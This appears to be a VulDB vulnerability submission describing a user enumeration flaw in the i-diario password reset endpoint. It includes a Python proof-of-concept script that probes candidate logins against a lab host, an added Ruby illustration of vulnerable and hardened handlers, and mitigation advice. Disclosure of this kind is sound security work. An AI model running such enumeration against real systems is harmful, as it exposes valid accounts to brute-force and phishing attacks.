Submit #627926: i-diario i-diario Password Reset Functionality 2.9 i-diario Password Reset Functionality

Title: i-diario i-diario Password Reset Functionality 2.9 i-diario Password Reset Functionality
Description

Summary
A user enumeration vulnerability was identified in the "Forgot Password" functionality. The system responds differently depending on whether the submitted username exists, allowing an attacker to enumerate valid user accounts. This may assist in targeted brute-force attacks or social engineering campaigns.

Details
When a POST request is submitted to the endpoint /password/email, the system returns different responses depending on whether the provided login parameter corresponds to an existing user. For example:
- If the user exists: the response contains a message such as "A password reset link has been sent".
- If the user does not exist: the response contains a message like "We couldn't find a user with that login".
This behavior allows an attacker to determine which usernames are valid simply by automating requests with different inputs. The vulnerability arises from the lack of a uniform response for valid and invalid accounts during the password recovery process.

PoC (Proof of Concept)
A Python script was created to demonstrate this issue (the application's user-facing messages are in Portuguese, so the script matches the Portuguese substrings corresponding to the two messages quoted above):

    import requests

    # Target installation used for the test (the submitter's lab host).
    url = "http://192.168.100.226/password/email"
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": "http://192.168.100.226",
        "Referer": "http://192.168.100.226/password/reset",
    }

    # Candidate logins to probe.
    logins = ["admin", "jose", "maria", "professor", "aluno1"]

    for login in logins:
        response = requests.post(url, data={"login": login}, headers=headers, timeout=10)
        body = response.text.lower()
        # "enviado" ("sent") appears in the success message,
        # "não encontramos" ("we couldn't find") in the failure message.
        if "enviado" in body:
            print(f"[+] {login} -> EXISTS")
        elif "não encontramos" in body:
            print(f"[-] {login} -> DOES NOT EXIST")
        else:
            print(f"[?] {login} -> unexpected response (HTTP {response.status_code})")

This script was able to confirm which users are registered in the system based on the content of the system's response.
Impact
Type of vulnerability: User Enumeration
Risk: Information disclosure
Impact: Allows an unauthenticated attacker to enumerate valid user accounts, which can be used to:
- Launch brute-force or credential stuffing attacks
- Perform targeted phishing/social engineering campaigns
Affected: Any user registered in the system

Recommendation
To mitigate this issue:
- Return a generic, identical message regardless of whether the user exists (e.g., "If the email is registered, a reset link will be sent."). The generic message only closes the oracle if the response is identical in every observable respect (HTTP status code, redirect target, body length and response time); for example, sending the e-mail synchronously only for existing accounts would leave a timing difference an attacker can measure.
- Optionally, implement rate limiting and CAPTCHA on the password recovery endpoint to deter automated attacks.
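The following is an added example, not code from i-diario or from the submitter: a minimal Ruby stand-in for the /password/email handler in its vulnerable and hardened forms, plus the oracle check an auditor can run against any responder to confirm whether it still leaks account existence. The user store, the mailer stub (send_reset_link, MAIL_LOG) and all function names are assumptions for illustration; the vulnerable responder reproduces the two messages quoted in the Details section.

```ruby
# Constructed user store standing in for the application's database.
USERS = { "admin" => "admin@example.test", "maria" => "maria@example.test" }.freeze

# Hypothetical mailer stub: records the addresses that would receive a reset link.
MAIL_LOG = []

def send_reset_link(email)
  MAIL_LOG << email
end

# Vulnerable responder: HTTP status and message depend on whether the login exists,
# which is the discrepancy reported for /password/email.
def reset_vulnerable(login)
  email = USERS[login]
  if email
    send_reset_link(email)
    { status: 200, body: "A password reset link has been sent" }
  else
    { status: 422, body: "We couldn't find a user with that login" }
  end
end

# Hardened responder: identical status and body for every login. The lookup and the
# mail delivery still happen only for existing accounts, so in a real application the
# delivery must be handed to a background job; doing it inline would turn the
# message fix into a timing oracle.
def reset_hardened(login)
  email = USERS[login]
  send_reset_link(email) if email
  { status: 200, body: "If the login is registered, a reset link will be sent." }
end

# Oracle check: does the observable response differ between a login known to exist
# and one known not to? Any difference (status, body) is an enumeration vector.
def leaks_existence?(responder, known_login, unknown_login)
  responder.call(known_login) != responder.call(unknown_login)
end

# Enumeration over a candidate list, as the PoC above does: every login whose response
# differs from the baseline for a login that cannot exist is reported as valid.
def enumerate_logins(responder, candidates, unknown_login: "__no_such_login__")
  baseline = responder.call(unknown_login)
  candidates.select { |login| responder.call(login) != baseline }
end

if __FILE__ == $PROGRAM_NAME
  %i[reset_vulnerable reset_hardened].each do |name|
    r = method(name)
    puts "#{name}: leaks=#{leaks_existence?(r, 'admin', 'nobody')} " \
         "enumerated=#{enumerate_logins(r, %w[admin jose maria professor aluno1]).inspect}"
  end
end
```

Run against the vulnerable responder, enumerate_logins returns exactly the registered logins; against the hardened one it returns nothing, because every candidate produces the same response as the baseline. The same comparison applied to a live endpoint should also include response time and the Content-Length header, which this in-process stand-in cannot model.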
Source: https://www.linkedin.com/in/vanderlei-princival/?originalSubdomain=br
User: princival (UID 88631)
Submission: 08/03/2025 18:58
Moderation: 08/17/2025 22:38 (14 days later)
Status: Accepted
VulDB entry: 320431 [Portabilis i-Diario up to 1.5.0 Password Recovery Endpoint /password/email response discrepancy]
Points: 20
